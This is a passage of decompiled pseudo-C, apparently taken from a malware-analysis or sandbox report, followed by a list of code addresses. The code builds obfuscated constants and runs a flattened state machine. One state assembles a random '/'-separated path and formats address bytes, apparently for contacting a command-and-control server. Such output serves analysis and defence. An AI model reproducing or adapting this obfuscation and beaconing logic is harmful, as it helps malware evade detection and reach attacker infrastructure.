				 *(_t903 + 0x54) =  *(_t903 + 0x54) * 0x2c;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) ^ 0xfdea2aeb;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) ^ 0xdae5ba81;
				 *(_t903 + 0x90) = 0x1ae0;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) + 0x9dd2;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) / _t777;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) ^ 0x00001273;
				 *(_t903 + 0x7c) = 0x91ad;
				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) + 0x8a7f;
				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) + 0xffff15ba;
				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) ^ 0x00003314;
				 *(_t903 + 0x118) = 0xd3f6;
				 *(_t903 + 0x118) =  *(_t903 + 0x118) >> 6;
				 *(_t903 + 0x118) =  *(_t903 + 0x118) ^ 0x00006a76;
				 *(_t903 + 0xdc) = 0x5b3d;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) << 7;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) ^ 0x002dec83;
				 *(_t903 + 0xe4) = 0xe1a3;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) + 0xb61a;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x00019054;
				 *(_t903 + 0xac) = 0xd034;
				_t778 = 0x41;
				 *(_t903 + 0xa8) =  *(_t903 + 0xac) * 0x21;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) >> 5;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0x0000a5df;
				 *(_t903 + 0x5c) = 0xce7d;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) << 0xb;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) + 0xffff4afa;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) / _t778;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) ^ 0x0019198d;
				 *(_t903 + 0x54) = 0xea37;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) * 0x7f;
				_t779 = 0x75;
				 *(_t903 + 0x58) =  *(_t903 + 0x54) / _t779;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0x6eec;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) ^ 0x00015ac8;
				 *(_t903 + 0x100) = 0xf0b;
				 *(_t903 + 0x100) =  *(_t903 + 0x100) >> 1;
				 *(_t903 + 0x100) =  *(_t903 + 0x100) ^ 0x000046ed;
				 *(_t903 + 0x98) = 0xe523;
				 *(_t903 + 0x98) =  *(_t903 + 0x98) >> 0xf;
				 *(_t903 + 0x98) =  *(_t903 + 0x98) + 0xbd6d;
				 *(_t903 + 0x98) =  *(_t903 + 0x98) ^ 0x0000db22;
				 *(_t903 + 0xf8) = 0xa379;
				 *(_t903 + 0xf8) =  *(_t903 + 0xf8) + 0xffffc366;
				 *(_t903 + 0xf8) =  *(_t903 + 0xf8) ^ 0x00004ea3;
				 *(_t903 + 0xc8) = 0x9609;
				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) | 0xfc9b1668;
				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) >> 2;
				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) ^ 0x3f26f1c9;
				 *(_t903 + 0x110) = 0x93e8;
				 *(_t903 + 0x110) =  *(_t903 + 0x110) ^ 0x6cc9c780;
				 *(_t903 + 0x110) =  *(_t903 + 0x110) ^ 0x6cc954eb;
				 *(_t903 + 0xc4) = 0x193a;
				_t780 = 0x59;
				 *(_t903 + 0xc4) =  *(_t903 + 0xc4) / _t780;
				_t781 = 0x1b;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc4) * 0x78;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) ^ 0x00004d55;
				 *(_t903 + 0x28) = 0x9917;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffff1acc;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) << 0xe;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) >> 1;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) ^ 0x767c70b9;
				 *(_t903 + 0x60) = 0x87fb;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) << 0xc;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) << 7;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) + 0x251d;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) ^ 0x3fd826f7;
				 *(_t903 + 0x80) = 0x50e5;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) >> 0xc;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) + 0xffff07fe;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) ^ 0xffff3d49;
				 *(_t903 + 0x90) = 0xf831;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) << 9;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) << 3;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) ^ 0x0f836fd5;
				 *(_t903 + 0x58) = 0xa7c7;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0xffff9b8f;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0xdad5;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) << 0xb;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) ^ 0x08f13b63;
				 *(_t903 + 0xb0) = 0x3244;
				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) | 0x63ae54c5;
				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) + 0xffffb71c;
				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) ^ 0x63ae2d72;
				 *(_t903 + 0x30) = 0x96f4;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) + 0xfffff5ad;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) / _t781;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0x2e666d06;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0x2e665524;
				 *(_t903 + 0x88) = 0xa705;
				 *(_t903 + 0x88) =  *(_t903 + 0x88) << 9;
				 *(_t903 + 0x88) =  *(_t903 + 0x88) + 0x9771;
				 *(_t903 + 0x88) =  *(_t903 + 0x88) ^ 0x014ee7b1;
				 *(_t903 + 0x48) = 0x3d5e;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0xffff4ae5;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) | 0x14fe6d6d;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) << 2;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) ^ 0xffffae8a;
				 *(_t903 + 0x11c) = 0x676a;
				_t782 = 0x3b;
				 *(_t903 + 0x120) =  *(_t903 + 0x11c) / _t782;
				 *(_t903 + 0x120) =  *(_t903 + 0x120) ^ 0x00006974;
				 *(_t903 + 0xbc) = 0x626d;
				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) + 0xc5ef;
				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) + 0xffff67d0;
				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) ^ 0x0000ba9c;
				 *(_t903 + 0x9c) = 0xc74f;
				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) ^ 0xf6981ca9;
				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) >> 9;
				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) ^ 0x007b070d;
				 *(_t903 + 0xd4) = 0xabeb;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) + 0xffff5ef9;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) >> 7;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x000061f9;
				 *(_t903 + 0x11c) = 0x4b6;
				_t783 = 0x58;
				 *(_t903 + 0x11c) =  *(_t903 + 0x11c) * 0x12;
				 *(_t903 + 0x11c) =  *(_t903 + 0x11c) ^ 0x000028b0;
				 *(_t903 + 0x80) = 0x3500;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) + 0xffff2fa1;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) * 0x6d;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) ^ 0xffbdaa6d;
				 *(_t903 + 0x44) = 0x660e;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffffa604;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffff1443;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffff2243;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) ^ 0xfffe0557;
				 *(_t903 + 0xfc) = 0x57ec;
				 *(_t903 + 0xfc) =  *(_t903 + 0xfc) / _t783;
				 *(_t903 + 0xfc) =  *(_t903 + 0xfc) ^ 0x0000115a;
				 *(_t903 + 0x30) = 0x1e40;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) + 0xd54d;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) << 0x10;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) << 0xc;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0xd00054ed;
				 *(_t903 + 0xa8) = 0x247b;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0xf4c628ae;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) << 4;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0x4c6080cc;
				 *(_t903 + 0xa0) = 0x874d;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x714f4b1a;
				_t784 = 0x12;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) / _t784;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x064b94f9;
				 *(_t903 + 0x108) = 0x5442;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) << 0xb;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) ^ 0x02a2423c;
				 *(_t903 + 0x40) = 0xc63;
				 *(_t903 + 0x40) =  *(_t903 + 0x40) | 0xcf27a650;
				 *(_t903 + 0x40) =  *(_t903 + 0x40) << 4;
				_t785 = 0x69;
				 *(_t903 + 0x3c) =  *(_t903 + 0x40) * 0x42;
				 *(_t903 + 0x3c) =  *(_t903 + 0x3c) ^ 0x83afb13c;
				 *(_t903 + 0xb4) = 0x9ee9;
				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) / _t785;
				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) ^ 0x2c71e887;
				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) ^ 0x2c71a0f8;
				 *(_t903 + 0xac) = 0xebb1;
				 *(_t903 + 0xac) =  *(_t903 + 0xac) + 0xffffa53b;
				 *(_t903 + 0xac) =  *(_t903 + 0xac) + 0x1487;
				 *(_t903 + 0xac) =  *(_t903 + 0xac) ^ 0x00009fba;
				 *(_t903 + 0x34) = 0xd0fd;
				_t786 = 0x5a;
				 *(_t903 + 0x38) =  *(_t903 + 0x34) * 0x48;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0x677b;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) * 0x39;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) ^ 0x0d2d2b78;
				 *(_t903 + 0xc0) = 0x7c5c;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) | 0xa19321e3;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) / _t786;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) ^ 0x01cbc5b7;
				 *(_t903 + 0x50) = 0x8c18;
				_t787 = 7;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) / _t787;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) << 0xc;
				_t788 = 0x1e;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) * 0x1c;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) ^ 0x23051aa0;
				 *(_t903 + 0x48) = 0x3d7;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0x6ad2;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0x792;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) / _t788;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) ^ 0x00005768;
				 *(_t903 + 0xf0) = 0xd2ba;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) << 3;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) ^ 0x00069d23;
				 *(_t903 + 0x114) = 0x19d1;
				 *(_t903 + 0x114) =  *(_t903 + 0x114) + 0xffff4333;
				 *(_t903 + 0x114) =  *(_t903 + 0x114) ^ 0xffff39ec;
				 *(_t903 + 0x6c) = 0x599b;
				_t789 = 0x61;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) / _t789;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x240846c0;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x24081360;
				 *(_t903 + 0x28) = 0xb43b;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffffc9d6;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffff5756;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) >> 0xe;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) ^ 0x00038714;
				 *(_t903 + 0x20) = 0x2b90;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) + 0x9fcd;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) >> 9;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) << 0xa;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) ^ 0x000194c5;
				 *(_t903 + 0x104) = 0xeacc;
				 *(_t903 + 0x104) =  *(_t903 + 0x104) << 0x10;
				 *(_t903 + 0x104) =  *(_t903 + 0x104) ^ 0xeacc46e0;
				 *(_t903 + 0x1c) = 0x2e68;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0x15408aca;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0xc28f26d4;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) + 0xffff2328;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0xd7cef55f;
				 *(_t903 + 0x78) = 0x4f9e;
				 *(_t903 + 0x78) =  *(_t903 + 0x78) >> 0xf;
				_t790 = 0xe;
				 *(_t903 + 0x74) =  *(_t903 + 0x78) / _t790;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) ^ 0x00003e82;
				 *(_t903 + 0x38) = 0xf8c3;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0xffff0aba;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0xffff96d9;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) * 0x36;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) ^ 0xffea86cf;
				 *(_t903 + 0xe8) = 0x47de;
				 *(_t903 + 0xe8) =  *(_t903 + 0xe8) ^ 0xd4f8af4a;
				 *(_t903 + 0xe8) =  *(_t903 + 0xe8) ^ 0xd4f89eb4;
				 *(_t903 + 0x20) = 0x65fb;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) >> 7;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) + 0xfffffa8d;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) * 0x56;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) ^ 0xfffe5494;
				 *(_t903 + 0x6c) = 0x64ca;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) + 0xffff11ba;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) + 0xc430;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x00005014;
				 *(_t903 + 0xa0) = 0x1b33;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) * 0x6c;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) | 0x1aa81449;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x1aab14e6;
				 *(_t903 + 0x108) = 0x9e77;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) | 0xd713dbbf;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) ^ 0xd713a936;
				 *(_t903 + 0xf0) = 0x6078;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) + 0xb979;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) ^ 0x00014992;
				 *(_t903 + 0xe4) = 0x5404;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x58bc0909;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x58bc1b10;
				 *(_t903 + 0xdc) = 0xf7f;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) >> 0xd;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) ^ 0x00005966;
				 *(_t903 + 0x64) = 0xb834;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) << 1;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) >> 0x10;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) >> 1;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) ^ 0x00004c5c;
				 *(_t903 + 0xd4) = 0x4bcc;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) * 0x53;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x69196900;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x69018755;
				 *(_t903 + 0x84) = 0xe13c;
				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0x2f0c4ec9;
				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0x8c1dd645;
				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0xa31179b0;
				_t791 =  *((intOrPtr*)(_t903 + 0x130));
				 *((intOrPtr*)(_t903 + 0x10)) =  *((intOrPtr*)(_t903 + 0x134));
				 *((intOrPtr*)(_t903 + 0x12c)) = _t791;
				while(1) {
					L1:
					_t865 =  *(_t903 + 0x14);
					while(1) {
						L2:
						_t908 = _t795 - 0x1ac77ed3;
						if(_t908 > 0) {
							goto L30;
						}
						L3:
						if(_t908 == 0) {
							_t890 = _t903 + 0x260;
							_t811 = 6;
							_t901 =  *(_t903 + 0x124) % _t811 + 1;
							__eflags = _t901;
							if(__eflags != 0) {
								__eflags = 1;
								do {
									_t897 = ( *(_t903 + 0x128) & 0x0000000f) + 4;
									E0200087B(_t890,  *((intOrPtr*)(_t903 + 0x130)),  *(_t903 + 0x90), _t897,  *((intOrPtr*)(_t903 + 0x4c)), 1, _t903 + 0x128,  *(_t903 + 0xf8));
									_t903 = _t903 + 0x18;
									_t891 = _t890 + _t897 * 2;
									_t775 = 0x2f;
									 *_t891 = _t775;
									_t890 = _t891 + 2;
									_t901 = _t901 - 1;
									__eflags = _t901;
								} while (__eflags != 0);
								_t791 =  *((intOrPtr*)(_t903 + 0x12c));
								_t892 =  *(_t903 + 0x120);
							}
							_t899 =  *(_t903 + 0x128);
							 *_t890 = 0;
							_t795 = 0x1da9be04;
							_t720 =  *((intOrPtr*)(_t903 + 0x10));
							_t889 =  *(_t903 + 0x140);
							goto L1;
						} else {
							_t909 = _t795 - 0x109a2717;
							if(_t909 > 0) {
								__eflags = _t795 - 0x11ab6705;
								if(_t795 == 0x11ab6705) {
									_push(_t903 + 0x138);
									_push( *(_t903 + 0x3c));
									_push(_t892);
									_t741 = E01FFF9BA( *(_t903 + 0x7c));
									_t903 = _t903 + 0xc;
									_t795 = 0xcf94e74;
									__eflags = _t741;
									_t742 = 1;
									_t899 =  !=  ? _t742 : _t899;
									 *(_t903 + 0x128) = _t899;
									goto L16;
								} else {
									__eflags = _t795 - 0x13f4272a;
									if(_t795 == 0x13f4272a) {
										E01FFDE81( *((intOrPtr*)(_t903 + 0x10c)),  *((intOrPtr*)(_t903 + 0x148)),  *(_t903 + 0xf0));
										_t795 = 0x1d56e0a8;
										goto L16;
									} else {
										__eflags = _t795 - 0x158b14ad;
										if(_t795 != 0x158b14ad) {
											goto L44;
										} else {
											E01FFDE81( *((intOrPtr*)(_t903 + 0x70)),  *((intOrPtr*)(_t903 + 0x150)),  *(_t903 + 0xa0));
											_t795 = 0x13f4272a;
											goto L16;
										}
									}
								}
							} else {
								if(_t909 == 0) {
									_push(0x1ff14fc);
									_push( *(_t903 + 0x84));
									_push( *(_t903 + 0x68));
									_t745 = E01FF5DFC( *(_t903 + 0xcc),  *(_t903 + 0x34), __eflags);
									_t905 = _t903 + 0xc;
									_t881 =  *( *0x201108c + 0x24);
									_push(_t881[3] & 0x000000ff);
									_push(_t745);
									_push(_t881[1] & 0x000000ff);
									_push( *_t881 & 0x000000ff);
									_push( *((intOrPtr*)(_t905 + 0x12c)));
									_push( *((intOrPtr*)(_t905 + 0x5c)));
									_push(( *( *0x201108c + 0x24))[2] & 0x000000ff);
									_push( *((intOrPtr*)(_t905 + 0xa4)));
									_push( *((intOrPtr*)(_t905 + 0x50)));
									_push( *((intOrPtr*)(_t905 + 0xd4)));
									_push( *((intOrPtr*)(_t905 + 0x80)));
									_push( *((intOrPtr*)(_t905 + 0xbc)));
									_t882 = 0x40;
									E01FF98C5(_t882, __eflags);
									E02000D6D( *((intOrPtr*)(_t905 + 0xf0)),  *((intOrPtr*)(_t905 + 0xd0)),  *((intOrPtr*)(_t905 + 0x104)), _t745);
									_t903 = _t905 + 0x38;
									_t795 = 0x1ac77ed3;
									_t865 = ( *( *0x201108c + 0x24))[4] & 0x0000ffff;
									_t720 =  *((intOrPtr*)(_t903 + 0x10));
									 *(_t903 + 0x14) = ( *( *0x201108c + 0x24))[4] & 0x0000ffff;
									goto L14;
								} else {
									if(_t795 == 0xb3bcfc8) {
										E02007187(_t903 + 0x148, _t903 + 0x1e4, _t903 + 0x14c);
										_pop(_t826);
										asm("sbb ecx, ecx");
										_t795 = (_t826 & 0x278b1eba) + 0x13f4272a;
										goto L16;
									} else {
										if(_t795 == 0xc2454b8) {
											_push( *(_t903 + 0xd4));
											_t828 =  *(_t903 + 0x68);
											goto L48;
										} else {
											if(_t795 == 0xcf94e74) {
												E01FFDE81( *((intOrPtr*)(_t903 + 0xec)),  *(_t903 + 0x13c),  *(_t903 + 0x20));
												_t795 = 0x158b14ad;
												L16:
												_t720 =  *((intOrPtr*)(_t903 + 0x10));
												while(1) {
													L1:
													_t865 =  *(_t903 + 0x14);
													goto L2;
												}
											} else {
												if(_t795 != 0xdea8839) {
													L44:
													__eflags = _t795 - 0x32f4d51e;
													if(__eflags != 0) {
														while(1) {
															L1:
															_t865 =  *(_t903 + 0x14);
															goto L2;
														}
													}
												} else {
													_push(_t795);
													_push( *((intOrPtr*)(_t889 + 4)));
													_t894 = E01FFA143(_t795);
													_t906 = _t903 + 8;
													_t791 = E01FF54FB(_t762);
													 *((intOrPtr*)(_t906 + 0x130)) = _t791;
													_t914 = _t791;
													if(_t791 != 0) {
														_t720 = E01FF5418( *((intOrPtr*)(_t906 + 0xe8)),  *((intOrPtr*)(_t906 + 0xf0)), _t914, _t894,  *((intOrPtr*)(_t906 + 0xb4)),  *_t889,  *((intOrPtr*)(_t889 + 4)), _t791);
														_t903 = _t906 + 0x14;
														 *((intOrPtr*)(_t903 + 0x10)) = _t720;
														if(_t720 == 0) {
															_push( *(_t903 + 0x54));
															_t828 =  *(_t903 + 0x60);
															L48:
															E01FFDE81(_t828, _t791);
														} else {
															_t795 = 0x37dee1aa;
															L13:
															_t865 =  *(_t903 + 0x14);
															L14:
															_t892 =  *(_t903 + 0x120);
															L2:
															_t908 = _t795 - 0x1ac77ed3;
															if(_t908 > 0) {
																goto L30;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						L49:
						return _t899;
						L30:
						__eflags = _t795 - 0x1d56e0a8;
						if(_t795 == 0x1d56e0a8) {
							E01FFDE81( *(_t903 + 0xe8),  *((intOrPtr*)(_t903 + 0x134)),  *(_t903 + 0xdc));
							_t795 = 0xc2454b8;
							goto L44;
						} else {
							__eflags = _t795 - 0x1da9be04;
							if(__eflags == 0) {
								E02008A33(_t903 + 0x1e0, _t889, __eflags);
								_t795 = 0x2ba7081d;
								goto L16;
							} else {
								__eflags = _t795 - 0x2392656c;
								if(_t795 == 0x2392656c) {
									 *(_t903 + 0x124) = E01FFA156();
									_t795 = 0xdea8839;
									goto L16;
								} else {
									__eflags = _t795 - 0x2b46f7ec;
									if(_t795 == 0x2b46f7ec) {
										E0200AA7B(_t903 + 0x138,  *(_t903 + 0xcc),  *(_t903 + 0x110), _t903 + 0x144);
										_pop(_t801);
										asm("sbb ecx, ecx");
										_t795 = (_t801 & 0xf343466f) + 0x1d56e0a8;
										goto L16;
									} else {
										__eflags = _t795 - 0x2ba7081d;
										if(__eflags == 0) {
											_push(0x1ff154c);
											_push( *(_t903 + 0x108));
											_push( *((intOrPtr*)(_t903 + 0xa4)));
											_t726 = E01FF5DFC( *(_t903 + 0x38),  *(_t903 + 0xb0), __eflags);
											_t904 = _t903 + 0xc;
											E0200BAEC(0x400, __eflags,  *((intOrPtr*)(_t904 + 0xd0)), _t726, _t904 + 0x270,  *((intOrPtr*)(_t904 + 0xbc)),  *((intOrPtr*)(_t904 + 0x40)), _t904 + 0x468, _t904 + 0x1e4, _t904 + 0x160);
											E02000D6D( *((intOrPtr*)(_t904 + 0xe4)),  *((intOrPtr*)(_t904 + 0x74)),  *((intOrPtr*)(_t904 + 0x68)), _t726);
											_t720 =  *((intOrPtr*)(_t904 + 0x38));
											_t903 = _t904 + 0x28;
											_t795 = 0xb3bcfc8;
											goto L13;
										} else {
											__eflags = _t795 - 0x37dee1aa;
											if(_t795 == 0x37dee1aa) {
												 *((intOrPtr*)(_t903 + 0x160)) = _t720;
												 *((intOrPtr*)(_t903 + 0x15c)) =  *((intOrPtr*)(_t903 + 0xc68));
												_t807 =  *(_t903 + 0x104);
												 *((intOrPtr*)(_t903 + 0x164)) = _t791;
												E01FF7B39(_t807,  *(_t903 + 0x98), _t903 + 0x15c, _t903 + 0x134,  *((intOrPtr*)(_t903 + 0xf4)));
												_t903 = _t903 + 0xc;
												asm("sbb ecx, ecx");
												_t795 = (_t807 & 0x1f22a334) + 0xc2454b8;
												goto L16;
											} else {
												__eflags = _t795 - 0x3b7f45e4;
												if(_t795 != 0x3b7f45e4) {
													goto L44;
												} else {
													 *(_t903 + 0x13c) =  *(_t903 + 0x13c) & 0x00000000;
													 *(_t903 + 0x140) =  *(_t903 + 0x84);
													_t809 =  *(_t903 + 0x110);
													E02007BBE(_t903 + 0x488, _t903 + 0x15c,  *((intOrPtr*)(_t903 + 0x130)), _t903 + 0x27c, _t865, _t903 + 0x158,  *(_t903 + 0x78),  *(_t903 + 0x30),  *((intOrPtr*)(_t903 + 0x24)), _t903 + 0x164,  *(_t903 + 0x100));
													_t903 = _t903 + 0x28;
													asm("sbb ecx, ecx");
													_t795 = (_t809 & 0xfc205258) + 0x158b14ad;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
						goto L49;
					}
				}
			}


















































                                                                      0x01ff8008
                                                                      0x01ff800f
                                                                      0x01ff8011
                                                                      0x01ff8013
                                                                      0x01ff801a
                                                                      0x01ff8021
                                                                      0x01ff8028
                                                                      0x01ff802f
                                                                      0x01ff8030
                                                                      0x01ff8031
                                                                      0x01ff8036
                                                                      0x01ff8041
                                                                      0x01ff8044
                                                                      0x01ff8058
                                                                      0x01ff805a
                                                                      0x01ff805f
                                                                      0x01ff8068
                                                                      0x01ff806d
                                                                      0x01ff8076
                                                                      0x01ff8081
                                                                      0x01ff808c
                                                                      0x01ff8097
                                                                      0x01ff809f
                                                                      0x01ff80aa
                                                                      0x01ff80b2
                                                                      0x01ff80b7
                                                                      0x01ff80bf
                                                                      0x01ff80c7
                                                                      0x01ff80cf
                                                                      0x01ff80dc
                                                                      0x01ff80df
                                                                      0x01ff80e3
                                                                      0x01ff80eb
                                                                      0x01ff80f3
                                                                      0x01ff80fe
                                                                      0x01ff8114
                                                                      0x01ff811b
                                                                      0x01ff8126
                                                                      0x01ff812e
                                                                      0x01ff8136
                                                                      0x01ff813e
                                                                      0x01ff8146
                                                                      0x01ff8151
                                                                      0x01ff8159
                                                                      0x01ff8164
                                                                      0x01ff816f
                                                                      0x01ff8177
                                                                      0x01ff8182
                                                                      0x01ff818d
                                                                      0x01ff8198
                                                                      0x01ff81a3
                                                                      0x01ff81b6
                                                                      0x01ff81b7
                                                                      0x01ff81be
                                                                      0x01ff81c6
                                                                      0x01ff81d1
                                                                      0x01ff81d9
                                                                      0x01ff81de
                                                                      0x01ff81ec
                                                                      0x01ff81f0
                                                                      0x01ff81f8
                                                                      0x01ff8205
                                                                      0x01ff8211
                                                                      0x01ff8216
                                                                      0x01ff821c
                                                                      0x01ff8224
                                                                      0x01ff822c
                                                                      0x01ff8237
                                                                      0x01ff823e
                                                                      0x01ff8249
                                                                      0x01ff8254
                                                                      0x01ff825c
                                                                      0x01ff8267
                                                                      0x01ff8272
                                                                      0x01ff827d
                                                                      0x01ff8288
                                                                      0x01ff8293
                                                                      0x01ff829e
                                                                      0x01ff82a9
                                                                      0x01ff82b1
                                                                      0x01ff82bc
                                                                      0x01ff82c7
                                                                      0x01ff82d2
                                                                      0x01ff82dd
                                                                      0x01ff82ef
                                                                      0x01ff82f4
                                                                      0x01ff8305
                                                                      0x01ff8306
                                                                      0x01ff830d
                                                                      0x01ff8318
                                                                      0x01ff8320
                                                                      0x01ff8328
                                                                      0x01ff832d
                                                                      0x01ff8331
                                                                      0x01ff8339
                                                                      0x01ff8341
                                                                      0x01ff8346
                                                                      0x01ff834b
                                                                      0x01ff8353
